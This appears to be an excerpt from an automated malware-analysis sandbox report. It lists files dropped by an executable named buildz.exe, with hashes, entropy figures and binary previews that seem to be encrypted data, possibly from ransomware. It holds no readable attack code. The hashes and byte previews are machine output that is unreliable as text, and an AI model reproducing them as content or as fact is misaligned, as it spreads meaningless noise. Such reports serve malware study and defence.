.4.N6u....|........[..k.V.V..;.x....N.G.k......]Dz..3V...[.....V[GR......bF.[....9a..P'i..j{..J.L.~..N.G..4}:...V..g...X....X~.,].....gl....D.....D....i...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):935
                        Entropy (8bit):7.745074275142555
                        Encrypted:false
                        SSDEEP:24:PmttnOyEvWBLiX7Ggvtzqi3gUU+yHD2GbD:PonJEGeXKgvAiQU0KUD
                        MD5:38B757AA27AB8B3FE245F41E83B6789E
                        SHA1:53CA932B2202CDDEADE7406A7038FA1F6A02BAD7
                        SHA-256:4A9FE949F7C4141BEA9E653ED448EBA722C489DC569C7768C8F7C27D368DD9A2
                        SHA-512:7D8C0D6B6362241533700CD660B9401C936427B76A6F16F5B373FC47150DE77DE58EC140423F4102EA2034CBB62913A419ECF28AA8BD2BD96CF2FF6ACE1B02B1
                        Malicious:false
                        Preview:<?xml.n%l..WI.y....1*eaF............+R.9%8}.R.eb.3Re'.\..k>..K9.A4..D......Z..... 0....q...6...;.Ur.G.>8.H..}3..9.....j..jfW...*.'.c.....k3.E..{..i..F....-.I......C..........W{L..~.0.2..v...A+j..lm9...^H.7.....S.<vh........c.W.U4zF.....1.>.i..F..n...-.v.a}..]C.;.xU|....id-.....`K6+f;.....D.d.7"]..9x.xJ .P..>.....!..=........o_T_.'u.E.KCp..}*R0.(.;.......T......F).X.<....K.hp....4.$I...].....@..>......3..e(.fNF....#.V....;......^6.U...9.+........K..S....!..|.....0...t.O...+..MSd.K]T.....;sA....NAs..z..._..<e._KD...{R.D.9._.@.&...b.M...lX..*.vp..yN.~..Dy.XUN..E..E..#...(..R.wo..SX...%.[......z.x\,MS|.{..lT{.G....y.'.u/.!sO.I.......l....;...P({.*.....$.%....:...X.`.0}.d..|;I..;t.S..C...6...c4C...6..*......#'.E[.}w.'..c...N.z..y.....q..E&k7.2:$....].]...Y......R.[..&,.u5..}$.%..(..L..N.#)... ..vh?.(&V.'r.H......F.BEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):980
                        Entropy (8bit):7.768440782373227
                        Encrypted:false
                        SSDEEP:12:KTHYZ2uRV6ab56g/peVOgSHRJVfK/yMog8jnQSi3C+Ilw4AR3pY+Y/uKgWsVF2Sy:htCzSxPKlogflYVA7h4NviGbD
                        MD5:A2D1AA0C0FDD1047E44934FBE9D2F739
                        SHA1:90BAC6A22CC97E7EE934B93961EA67DA09ABDCA9
                        SHA-256:62840410AAB84D048DDE7C250BE9B79CC2F0807460571B6A273E06BCDB5CD1EC
                        SHA-512:B460992B2C1CB06F9E5C36356EA3340EEE0ADE537BCF0BAEB10605EDEF5816C2E96747FA0E2422BE7E930474575302FA2CCEF7D34F069A353D84B263D77B9FD4
                        Malicious:false
                        Preview:<?xmlNi.?..8.m..2I..y..6....y.7@.>..B.*...9=..Y.E....+.h..&:n.L..$A...^.v...s|x.<.....'..2.B.....@.AZ.G..q.>.BH|.<L`a..U..H.-5..@?.{e%vAf....+..%D9.H...............i9...>`...Z1.b...V.....`.d.X@:?.Q.6.u.#%.>oN..(0.2...e.. <....9.$...T.....>..=H^N.l.E.K.F..L..\....~l.....d.P.;*#...p.Djhv].fa}A....q.D>.d....P..t.z......A.s.C......z/.`...1k.?.N.Vd....C[Y(Ms.....n... n...S^.....`..W.cIu....nIB.{.a.y....\H.Z..4.=...{.h.H...Cs..t`.M...sYm.J>...u.9....X|./v....*..)k.).7K.V#h.Q..j..A..!N...#.>.S..O......`...i$..sH8.g..!.kl..C.d.)s:.3.{7i.s.;...A5.^..@>'iZ.M.....Pte.q.$1..8su...%..aP.4wU.yW....,..~.....(.0Aj...E...y..6.7..da...rJ@.... GH##q...<.'..1......w.+.{......_,....]...S......-..=.J.-:.\.o.ixp*(....)....H.;.?H.NX...c...3.gK...<C....5....,!.y.k...V9...q.}a2$_..zp.Z.T.:.z..w...4:.~._sAO.......[..#E.....,y...s.H.v..umF.[]....P.e.`.....2......W..)...Y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2312
                        Entropy (8bit):7.910102917437556
                        Encrypted:false
                        SSDEEP:48:6PSKoL1G0yLn2QRw0rNcOqwq8F4qBtctizxxk+hUD:WY1G0yL2QRw0B19qY+QxxA
                        MD5:71A05A66E79F9137988EDEFABD57AE0D
                        SHA1:F415F3861C5D56D1FDB2E14F6DD50D97E040D942
                        SHA-256:2781DB68717359DC81E8B35D9962FCFE1BD29B8AAA202BFBD82F4A02DF6122A1
                        SHA-512:EEC7EC4D77E6121FA3DECC055DD4DCE4826A8000539C90384BF6864B77E772419D9B19D48CB3DADFCC97634504C49F311D4DA9749672CA9C3F72C988AE538D90
                        Malicious:false
                        Preview:<?xmlkQ'.....B2.....q...v..H..H1..E..F.,j.Q.1-..N..aJ...9.R.e......../....'.l....#a..........\...b.`.+kq...*2~.N../.......CX=.b=.l..H.%k..<N...5r7.T..@....f>.&...V...T(y.RV...``p..(.Mf....6P.....\.&j........g5 W.......NZy..^...Y..];?.x.).9...z..".b..#:.]....h..^pj.&..:,k....H..A...\..(b.o..>..-.g.....g%ro.....DF."...]h......v..;c...Y...N.n..Q..m..pH@,......\.B@.xIp./$/.....$...>........Z.Y...7..O.c.h%....Iw..D1......)d.Jg...=.YU.q....8}Hr... x.wF.4-y.!...@..@..K.h(.Q.....o.W..../u.......g|.0.~.L9....}.i......j...H....$.n.vQ.`...p.*...h.....L.......5S.A`...2......Z.a.1%3.#.-.$~N.L.......?.<...X....]GZT.wUs$.C...+i.RJ...7)&...A..H<.Z...4..'T.HT(.i....ezf.2%O.g.....w....:1!..6....G.ai]..SWA.....O.E.'.".mH...<.q.2.kE..hT..'..........&.H.V..~4.I.....3.~..'...RV.vk..).....m.F.rys.#.Q...dt.S..zc.o...."....a3.i...,.L...EV..?.<C.~.u\..r.q.5....t...(.....@.my).#1.......S. ....zQ4....S..J{....`.>...Lzi....W&A._.:O..'(v.u...]!.G.L58.^...=}6.Z......c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1731
                        Entropy (8bit):7.86937665913499
                        Encrypted:false
                        SSDEEP:48:kV7lBWl54zrwCchNd+KSV0NRIrRWlrlkHUD:qUcyzfSVEa8uHA
                        MD5:0E62860660E5A516D6182A4C68470276
                        SHA1:B1BAD639F5CE7A016A4D7213827F6DDF08246A48
                        SHA-256:A24049CE67C97627D48D212DA18A508296EF3340495D9F0A4E2771D27912038B
                        SHA-512:0AB5474D16731636E82B3AF368458F6258E1DB226D255F521AA8C805FC660A907DD6F7237E1386CA7633DD5A0084366D64D058CC9AB7DD33EA9215516AF10EA1
                        Malicious:false
                        Preview:<?xml....-zx..}.G.l.. vm.n)......e..w$.N!...Br(...ZB.r.....}.?pJ.?...9.U.^.._=........KL.K.s.....q."0..8..}..AU..L..-g..cD...#..?...t.x0C..jg...%?Y>.X.F"........f...y....x...rP...d...nS....m...z&9..}..6.,!V8.D...s..B....:....ut...#6H^....yi.....!....`L.2.C.-.........KP..3..n.<..y.N....Q.`..........?....-+|p.(.|-...i......[Y...F0.v.&[..o"......h. ..A`=..ie..N.p....l.Y...Td.o.3...;..^B~.!.Nj..=.............-:.v.P........G@.."R..1>]z.-..],....y'...BOV......'...q.f..A..k...5w....>?..&YG<...40..0T$.)R.+y...........X..-P.9.sZ.....PQ...h.Y...9.!...lU.E..~.+Nc..,.$n[.6..+=..;. d.<q..l+qRd..E.....[kU&.....J.........rC......M3.U.....E.5'6@.8#.....m...~.[w=...*..[p..&........-..\{t...L...........H..@.C.....r.\...ym...h..9..f.........r.s..:.ie....e.J...(R6.............A.....M.8.aUr. ..z..h.0.5....*k.X..c...Y.p...k.4...^....U..[..2. ..d....0..$%?...T.T.qG.S4..$....E.....\.+G.?Y.c....9(&..e.+k._.,.5.:h.r5./..mK.L.F.BB.,.B...B.Y...3..|od..h..lW.-....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):916
                        Entropy (8bit):7.738679810707485
                        Encrypted:false
                        SSDEEP:24:RF0FvfEdtbWcYUdJ0liYkNNkcqQQdZJelG1GbD:RwXEdtulivNLEZJVUD
                        MD5:46EC3AC473DD4FA710686D3729C7BEB2
                        SHA1:8E31B13D68700F2FB8BD3F453FA0BB4B0FD63E31
                        SHA-256:93289E9A3838B5A811565A09E9631B7B602F421792FF433EC4061E2D5C6ADC26
                        SHA-512:5BC97EB3370D037718AFB709261435D6BE94FE2FDEF18BBC64A03D5FF0A25882810036D248FC69DEA603D4C4D08DFDEA64A7797F0EF23E8E1DD5A5A123D1F83C
                        Malicious:false
                        Preview:<?xml.:.eV........r|..b..}...s...D......*]G.XP...'...A..h...+.k...l.S.....,>..|8f(a.`&.M...D.....l..6..XF2.$.u.r]...J..U.[..+I.<...m."".c....Wu....&..Bi ..N..v...O1.%..`.O.....[.....J$.*1m..n....oSY.i?.\..Y.6..d.N.C.na....../..l9.V.$.......$...q5...$..p..v7|..A#r..1$...(}3E.`6....L.....3....UP....\[..v....3..4.......a...........nx.&...............`a"e......@,/D.0..=..ps......0.....K....q.%....7PC.Z..KN.g..\7Z.b....;.25*.m.....<...r.Q..E.2....Le....E...a.*..=D.i..h.=;!....(....h3..K.4.....Bp1.jEqs.4=.p.L..Bnj.....n88.|..I?...0..R..-....Gx. .........Wn..'6op$..........jqj.1....n...(q.2..........f'..B..tS<S2.Z&9..{.h...Xe..4\..d.L..so....7................9...~......>s.!Q..A-...xvh[]mK.j....[i...d=E.$.D.$'...l.....[.?...k...z3l.O.)c.>.\...0..A..$.-.:..CR.WY%..3...a.`:'.x.b...x.t@..9.^.!.JAL.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):887
                        Entropy (8bit):7.77579336982838
                        Encrypted:false
                        SSDEEP:24:GWXhryEomXrrx9r/goyyCFVw6sepBB9UKpvGbD:G4Xr19L7CFVdBXvUD
                        MD5:8E617F6D38FA8FF89BC388A3C368C2AC
                        SHA1:F0CF99C03D13FF19B6393A029CB4AF1469B39207
                        SHA-256:40FD84EAA0E995999DA167BD2E64DBBF44738B5C9511F6112A8470B3E302A0E2
                        SHA-512:970768FEE0BE41729D40BD405772E49F802E085A78A9F556C139E0BF8A6FE7858013FA8E5D59D908A2E744E2943A45C8E0ECB2C3C225D6A726614478F62E8094
                        Malicious:false
                        Preview:<?xml.q.a_ .Y...h1k.:e>M...HId..X.\.q.=i.=..'...{..6.s'.te...+.....mU~....C.Cf..-..}[.k.K..>..A.2..hx.......:...Z.<......I..!I.].&..........?\...O..c.u.....Df7....Iq..?.w~.}'A..U=...l2b.+....W.0&.b...p.i.. {V.[.A.....Yk%.....f.y.@..U.......#..3....y....<..[.Oz ..|......3..5.8v(. ..@X(*..Py.....[.?.......d..A..j..........+...z..d.Q..X...?...[.|{..(..;h.O}.(M.j\+....,.1.>.q6..W.....E...#.8...T..s.Bw~9.Z3...|..%.R..,......GF......xz`....8.c..v.|....+)t........m.....4h...S.x..bS..<%I....4O8^....|&....X......=..4@..'.!..rks..u.d.c........$.p.J.e-W.......}a.$.......E.Zg.0..$.....o..a...k..St.pLp.........r...2...Ikr..u]..2..f....Oz.^n.3m6..0...B..2..O^./.7c0S/l.Ye...ms.<G:N.<8gN..r...[.&.%.mp.v]m.6f.)..<.VY.'5d.;`...D..[..p.&..._.....l..!..t,$U...'....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):975
                        Entropy (8bit):7.803831977438445
                        Encrypted:false
                        SSDEEP:12:49SXGyiJvpg6bG5ZMAT+aSt0mEw0ZYnTpn3GmDE18jaIjKtjPv8mLTVGS+jU6lXX:4wXepgfoAT+Trg+DCT1RDWV4tGbD
                        MD5:E8B0F84E63FFEA7DF47874D8B73BCDC5
                        SHA1:1010ECE89D7B2AE51F680BE9E74889E3E81C9564
                        SHA-256:58D49FF857F7AAE8BAA8B9C171807DD63083CF15CA312B10679AA87406B70238
                        SHA-512:FBEE961F6187A2CD487DB7C8F09427C40547D309F88533951560DAFDF5946E136078A78E0AF811388F9968BCC8276CA8BD7759C9EBAF0A759C012F4BD29B74B8
                        Malicious:false
                        Preview:<?xml.VQ-..R.X.[td.".D.O[`..8FG...ZP.,......%..xX..U#&4X...V.......p@.....e ...k.NT..V.Z_.......7F.....[HlQa`..,..ej]....Y..<..GVdZ..D.....|.C:..A=u....z.....W..E."/@yFx.....x....|%%{....}.<E....r.*^}..%..)C.8.zG.YR.o.....(...r.....N..R...>....?..n....Z.j.7.....%....*...S.R....n.ru'y..H.../....b.~&F.N.......#.]q(..(..JB.......Be....!..\.Rd.Z...L...l.....w..I.,.c.>...e.:...9.~.......9...P=G..mn.JJ"...I'Y..?.y../.u...2)t<....E.DSqa...r...V..v.....c.~[.......XP9x.gB....._.1...L.to)..2mNP.y_D9A.?..z...K...m.O....w.2}.........P.....Za..sp..[.Z..v.U]v......K..;d..%../x%..........s..)...!...'..n....5....G._....E. ..l.=.T>...U..i.......Sr..%h...T2g..........i.$G..%...N.^..`....x.k..s$;..i......d...h....e....}x....=.@f.....P.(P..9..!.$G..|......9.a.(W.zz8W..y.j...AR.+.T.H..?.Kr.e1.%....S...Z..@..u....i....3...v...g.sR..B.`|.b....f...Nd.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.727921368641207
                        Encrypted:false
                        SSDEEP:12:V9Bje58gbSrQliAtJWBQjrbm9sARKv12QEZD4Ri0D0/jFoXYNwXiHclsl1V/26GX:NgbSrOjfmyF9uGvYNgiHclmGbD
                        MD5:C86CB00E7D39A1CF31BEC822CC9F50BF
                        SHA1:414BE1E7E7C371B68A803EC674F136520D8EB3CA
                        SHA-256:1BCC21E7F62B283687FE5DA85F847E1C93CB038DFDEBB21FC96F158F3061246E
                        SHA-512:70E428253230E88C10D1278C9067BF19CDDA13E6A34FFDC833F5EE791E304F6C9025881A3FC62E471B9F4BF2AEEF76F7E8D5A3D6B623145246179B141D7EE197
                        Malicious:false
                        Preview:<?xml.B._.G..c.l.....L....nq.5r.Ir..Y....(my>.Wm..k.V....."T....=..<..>2....?.<6..|.T*...H.U...h..c.Z8...(..}0.N.\K)...._..c.Q.-K.@..d..%.... (.....K|..i.r>..n.N=9.:....TH.....z'?/)..e........@....,..]..s.~f..I..I...M...@,..6&.&)...U.9RF.-..7..1.!.Y.....%.%S..a)....3;."...*InQMy.&.{o%...w.8,c.e.d..IW.....r.Xd.%]M....+&zs.....j$=.~/..:t.}.2B....~..:..h......e}.....C.....?.]...;y.1..<..n.....x/..........."......V.U.r..`'.............K+e.........x.@u.gDO....>...b......O:..8....}......i1KV.ph..G...=.(ST.[...D..y......n.Jqxr/..8*...]..#..r..a.7...<.,Du.].a......5%..q.W..3..Z.C.s.!.......... ...=..9K..h..pEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1031
                        Entropy (8bit):7.778280924717009
                        Encrypted:false
                        SSDEEP:24:fVNlqpXTFM9O3shXc3+JhSpy59F1jxAgeBIO4fa9GbD:ftqluOchX8+JhSEnF11AgrfSUD
                        MD5:F362C1A5CDCF352E4EAB8FB1408671DB
                        SHA1:C3040504785DA7CB16AB33E220B367381E231512
                        SHA-256:00AFBB6EDAEC6A21DB4E1F0A689C2715809DAFC47171DE90BB18FD6055AE132E
                        SHA-512:376E352F9534A2F6A51AAC75FC2DE9E122347D4A72513B6EB971ED5322ED7D45857DFB919D6DFC0970BD1C8BE72CD6900E7F9A3A444C2A627E8DDE38200221AF
                        Malicious:false
                        Preview:<?xmlB... k.\.x.....t.......GDf$eNb..Q=~..P....EmN=.}.G..b9!........!........F.].7...+.f.r?...9.C...C4...BlY......4...T.Q. .%..@.(./%.....vC.j...0.aX(.......#.s.w~.>..q....$.L.6J..>.....F.k.#G......@}..cw..0UP.........C.R:..........28....H...^.X.vvPU......k..E,C9.......J.\..?\......}......5..0..q...#.<...f.\..|...7..........hpW5..p..t...PX.y....?.L.9.#..02.W....u{..n4u...x.....cL.y<......JYu../.....7B..8.9.DK`......`.......[6.}T.t.wy.S&S.=B..+.....&x.IE....0Lj.L.....9xOr.l.....Gd....$.(....y.!$EM..Z&...r.H..h".....$.H..tLBCg...<...%u.L-.Ic@...H.Ft....D...c.B.Zd.i...H.zZ..AQ.hbM...a@......q..Q... .m&.Y..c...wT.9~.u...w..?.0ff....Z..../.ts..5..U....0.D....^@s.qd-...e=~!i.i--JEK.J.i"....G..o.>{Y....T.!n.t..,Se...}...Y...E.#4......>...p.p..S0ZQ7.+.Jb.G.#4.n.....DW..wu.l26w...;...K...0..T.2.j$?.)von..}.6.g.'..c..8..O#...tI..wQT+'...:..N3.dz...r(g.Q...O..Z.{.;.*YS...j.P......P..d..6;8..-...u..tS.F...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1143
                        Entropy (8bit):7.819751321638684
                        Encrypted:false
                        SSDEEP:24:cLLEJwAQGNytOv1lDrYwQEnMURoZ7P6fdY6tIlGbD:CoWW9v1VrRQExoZ70dYOIlUD
                        MD5:3CB79C24FA38DC8D2A379DCECF0B98A1
                        SHA1:2D419851980DAB055C8452A5414A3D9811236C77
                        SHA-256:93D1599D069A721F22B9484D797FD23BE0F4D0F2CCA95CE93B11C3C13229662E
                        SHA-512:6A7539C668EF907B466B57033EF436FCA0FB29AA7D609D53A97D85AB1F3BF035BDEA9A312411D64687C70C0F3A2863D791F83B9C59EB145E7DCB707B13CEF9A2
                        Malicious:false
                        Preview:<?xml...C.....t..X.P.V_..03L........#.ue.2....|.yl.;........4...G.f:)V.v.[.Z.@......v.RG^......F.E...X....dCW+..d.....V..4..|\..x...t..ST.......9.......T.....M....'r,...P*.0$.7z...s.....%.]0......H.&..H....G.>..B......I..MtS..H..0..}..w.z.....2[n.2.S.U%....J......Mdq.Z.c.A.....^..C...^.+cr.:`:..k^)k4.He..JKSL..).B...]|.EF...v...b...p.H...o=..".L<.K.Wk.g...nT../..}..v8..{<.M..9..|...7.I..#oE..q.rU..uD.[_......X.d(.....%...E.....q...I..5..R........]qn..k.~.a.D......D..K.9;....F..P.'..F..,W...A....e.<ba.E@......m.3."8...;..n...H....IZ..wy@.0.$..v..".aa_..8.5...M.3h.j.#..E...3...V..../.M..w.X.r.......!..X..b...V.>!..^.8E.M.N...2........K..a...$...tw...L....i.@.....!....Dx...Yd...... x...../.._..p.%.....9..ce...VU......<.....^a..q....maq.&/.....%..).BR.....hr....R.l...Fu.......f.V.T.b..9.Dk0......U@....D.^w&..$.5T(..S...c/n8Z..^......C*+.........m..u....p....r.FOm.......s..r).M.Msls".Q.ol8(....i.0mE-{...C..+....{Yw%iad..v.gNj...WJy5...#... B`D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1503
                        Entropy (8bit):7.869025601366152
                        Encrypted:false
                        SSDEEP:24:lwfqzWPl/dwqRgk9U3cY1pBWs+sf4IYfqx8yT3wl9/B7/CMtUcGY7QGbD:lwfqzkdw4gk9GBPgs+Q4Imqx8swfJ7/1
                        MD5:A3B2BA81693749BB7BD883ADDC6F7ED8
                        SHA1:9CC95AC9A23C6A2267F9F94309DF56E205439C2E
                        SHA-256:E582934E50010C1E57D130E9540469A40755827C46C4D14CA64F63CE2FAB68C5
                        SHA-512:1367D626D2164C8734C1DD77B4C1C794A027B0A4A21E4DC34FA0A84D76453B72F2EFDED180DCFACCF409C131A34B92618DF278175DF935BEA8C49A5CBC518067
                        Malicious:false
                        Preview:<?xml'.F....u.-..{=..\...h...g7..'...}..(%..~...Bq.{w..."H.n....o.....T.J<o..3.......2.A...EZ.9A...ci......q....A...a.5...f...7q|^...&{....[y..7...|..%]...[..^..x...yRx^=^].....s...p.?...h...]:.W..&.C....e....q./...;..DZ..%P[.~.n.9.EdR..6<...9V,...p ..8Z......^FOo....i*9.....>.....%A=U"..3r2....o..[.;.U.u.>..z[-....H.....D._C...0r.ffq]*.....]..Q....v...A.......;.0BU.a.ME.$...B.&..............]..r.../...)...y..h4...".E.t....V..$.w.m#.........J....i.,osr..O...(.y..e...R..8.GA[.L..*...y1...P..'.=....@Aqo.1..#s.9....V.^.W....x.y..._..Pd-...8..D_.Zv.....%.Y.Q..>....O.MP.z.^..2.a.%..F...J..m)....J..H....E*..$..U..D.\....f.L..';.yy.Gz..0.s..B@......._b.jK?.-.eq@..+.. a...v.....U#_..:...SQ..z...Nh....sQi..n\mV.{1[.a..7!..%=.C`Y4..&.q....Gl.a.......P.x..T.W..S..O...}.t+....M!....E...^.bX.z...!,..i..... .\...........oh).;.`.S.qT ....-.........-7g+.rk*.......N.EA=s.1...,.E..m@.xF.E.q...B18W...T...d...>>.Xf...H4..t.@...e9@..^....d.....|~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1036
                        Entropy (8bit):7.761349143261315
                        Encrypted:false
                        SSDEEP:24:3LuoxHsIrG0AKBxO0akt1xNXjE9/+xUxn1YuXIGbD:7NH45KBE0ak3xNXQp+xKnNIUD
                        MD5:5A25FBF8B436BF5C44B727E2BC984691
                        SHA1:CF8BBC46D2FCB78EE3A8FD01AD442C2FD27F6943
                        SHA-256:FA895B1BABA33F2D088885BEC019B8503374C821362E75C4D4AE372CD7735B4E
                        SHA-512:3CB3857C67511EE3ACEDDCEBFD9D3EBDF8F9A36F9D62EFABD6782E01C7CB23CDAF6CFBAE6D8898B782D2F50C3611AA17ABFFBF0B9DEA40DF3F04741344651798
                        Malicious:false
                        Preview:<?xml..u.h^P... {x...1..Q>.p.....Xbt...U...#.N."..h.. .O.mM...4....l..u4....URiE..v..I`9U...Taq........9..K..a-...........(.._..1..z......G...#....._....5....c1{C.F.W.........W.`.......I`..'l4*......$".#..i. ..T_b...n.....=_8...i.S.A ;..v.[.......iD. ..-z...I..P.I......N.....6o...r.O...o%.Z..1..1.p.:!.u..o.m...Ce.Ud=8.W..n.&?.?...Q...M'E...qU@..~.T8....{..Z^..4.'BM.O..(Z..2N...t.sG.G.g...d......M.....5.\..F).M.3......B.4%....&.....+.H6.....R...../.?>:......:.D...<......(2.\..Q...lH.c.Y4....|cm#.......q..~{..82..f^G.eT.J.NN..I...n^.{......G4...n .V..c...de..}...:#.!......q.1...C.....,5...U.TY..]..Ug:..G.SUg..p~zC.]....D..G.e......I?(....h.1.Y......."*.p}v..(.;\Z...C$..R..hu.I.T.,...@.p......%n.l.a.=[.6...XD....$.....,4.[/.A..c...{...|c.t>LxO...>%...H. .......a.,....E9...g.P.YMV....E,..-I....U..P..n&l:..........qq`9.Bdv8.0>4l...2........S....h...%.B9..RM...@....i."..rE...}O..;...J.('.k.-h.UEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{3
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):934
                        Entropy (8bit):7.75654979796491
                        Encrypted:false
                        SSDEEP:24:j6Dlez2FSotxdkvkfdEtqiuyPgyDycscDiHaWGbD:j6Ds2F3rJd+Rokycs2DWUD
                        MD5:4EB64084058FAB3FF77D90F9B9EEA9C1
                        SHA1:F409355CAC60B42373CD3C3F4C1206E8FE7D7E26
                        SHA-256:164C4EBCD6670FFA62D1C73417CC08E07D1FD96D442A3ABBB5E8FECE64762289
                        SHA-512:60F7B6D9D0F6F7E523BD09A6B1C966340265942B44AE5770C9637054851D6AD23B55F6D5DB5A72724B75432B17AB2205DA8CD080C86904182C8A0FD42A89771B
                        Malicious:false
                        Preview:<?xml..Bx.7.&?.No+.f...~`...!N.43.....M;.RU._.[0\..RhZ.ws.4..+..K....0)".C... 1c.)..A..%..=..F.....x..RV/^..._.Q....m..oY.!..8..*.FY.d=.K..eH.i+..}.....j...../G.V...m....{.sD.&...k...p.i/.?..'..'.ubw..-7(.V..kTg..p;%.=....ej...d%..-..\w....qj..E...[vS..=`..B...X..X.c=............j5..,]...........z.m<Y.1..d..y._poNj..UXC4^A..W....3/....J8.;..g...lw...l^. .N....6]...b..?......0W.9....d\.8.../.~y;| k(..L.{...%q^..!..P.7Y|c..Z..GRK.^... .U.,+Ad<..W.7 ..vg5.b:..r..\.H......e%rXQ~...s...v........W..#...$..8..N.mK.!m 9kH.P"..\....A.fy.W....:.0.q8.I..xrR..HHv.<V\...M..Fh<~q...;..};.MY...x>......gM..>mX).xh...^+1.K....+zRO.E..I.F...r.(1F].D..IB...k...r...]..g^.O#O..w.:a.u..I..j..t.......[.u...(.^$G...b.$C..r.Q.u..7o\.X...g.-...$S..&t...ugO{f...8...Db...p...='.'.FG.. .Q.d..do...d.Z0Y..C.6..~m.M...YM.:..H.'...k..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):723
                        Entropy (8bit):7.634349784706643
                        Encrypted:false
                        SSDEEP:12:keyQJansHSiIaLiz+hZqZQpQTwPF5oYljz/r+352OnPhvoE93ALvdAMceDzy26GX:PdEsH1IxzQEQpQsFj/POPhQE9wL1ArOB
                        MD5:7992774448D851507387D7B70BF435D7
                        SHA1:DDC367664CECFBFFBED7F8EB7BF77AADB110049D
                        SHA-256:38BE384E9D43C3A980EA9AB21CCE5ECEED32B7EA06A0984C2FFE4E8148EEBC96
                        SHA-512:4AD5672AF4245B24AB661E39E837DB3E6AF97E9993A6970239797355803FAAE5968AA3D5A066E925AFE52AD2EA9A538611E6CDC259617184414F0EF95910AB83
                        Malicious:false
                        Preview:<?xml.4........N...w.......<Y.....#.......b*....((;..KfO.x.=?>I........%..?.`..xiG....-.D.D...)O..N)e.w.qK.....T.....j |...htlv.8.X....-lQ..n...Gy.........X.?i.U..-.6..~...........g...d...3...5..H.k.5.*...m..2..............'f.N~.&x..h^...a@B...5.b.~..$.....98eT.9.....z..M.~K.D^.q...Fo.'T.x...z.g.........m..#.}......b(2.8........b...x..P....M/.W..-..*@.#-....N...2X..........O..e.o.L..k#...f../e=T.4..<..Cqv...X.b.V..(ka.Y.......>TcgD7...*s.a..z.x..5.au.8....1....8..(*....gWA..g....X..)];.8.Z.}.."E .kd..b...F.H.z7....Q....._Jn^S.2...T..zO.8.u.......O..n9....Q*.F<9../S.....K)..C.K]..)..p.E.{du..VYt..L....f..U....l..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1089
                        Entropy (8bit):7.781749049510133
                        Encrypted:false
                        SSDEEP:24:wZmVTW26Ka8B06tIVfW8kzkTZEP78PeiD9/02nSLd3IGbD:Fq26Ka8B/to7xTZO78Pe4Rtn2OUD
                        MD5:C5D2859C2F421FAD784BAD8C9D6FE9D5
                        SHA1:EE6E734FAD1B49B3681164D87BCFCA901BB9BD10
                        SHA-256:57B00FA7673B2CDA72144FE03958C5DF25E1D9AA20AA66F03BBE7E030BC367B9
                        SHA-512:B71A63316A97A11BABC652C85CF50109A458E64456A114F537D46B8DDA1753BF02B24AA5B4DFFB334C120F299DE4D6AD56D45842CE295C54BE4F6177C3C4C050
                        Malicious:false
                        Preview:<?xml.iT..q..^.@......J+4.~..J. .b.(;..tO}.6.?.....3...5..#.."Cls......v,r.L..y..LJ...].S..T....e....*.M.$"..F......6.W..d5.8T0(Ma5g..I.OZa...8gi...N.A..).`C....Sm.(.<..fQ......9......*R...ze.^...V.XU....&..Tv..m.&........+GS6'.0.:....B...xY..o.`w..F..9..N.Y.v.zg....B..Z.x.....(mIl....i.. .X..gA.%-...^...T`@..XQ..9J).K.....f)..y..obn/....3;..Do.S..ZE.9.=.,.c.......!#..[.%...vFF..&/.......P...U`.....F56....@I....6?.......7'a.3<..*Q.d.g+Gq<.H.4..F.y..{..?n....B....@.....: .|..TeY.<..Y...a)..4w.3T ...U.v9.I...a6..9.]o.^.eK.?6...b*U.RF...a...oM...>......^..$!|.....-v.d.X.....Y.L*Cz...........^S.M..f.. ...!...hx.(;.a........[..Z.{.._.s.........8t3..=$!.m.%...5....}.x...$...Q.7..*...0......r.`zV.J.J..?..6......'.fv...=h..sS...B.O...>.D.......HU..._.7..I.QE........Z.......f.......M{RVI...kB...$1...f.h.D92.%..l.H|y......~.n..?.[.}..7.k<8E...F.#.}..;..l....3q.8.YrH..iE...U...-.$.fy..y.....3....M...p...........%./).5....&.Q'......\...T.k.....
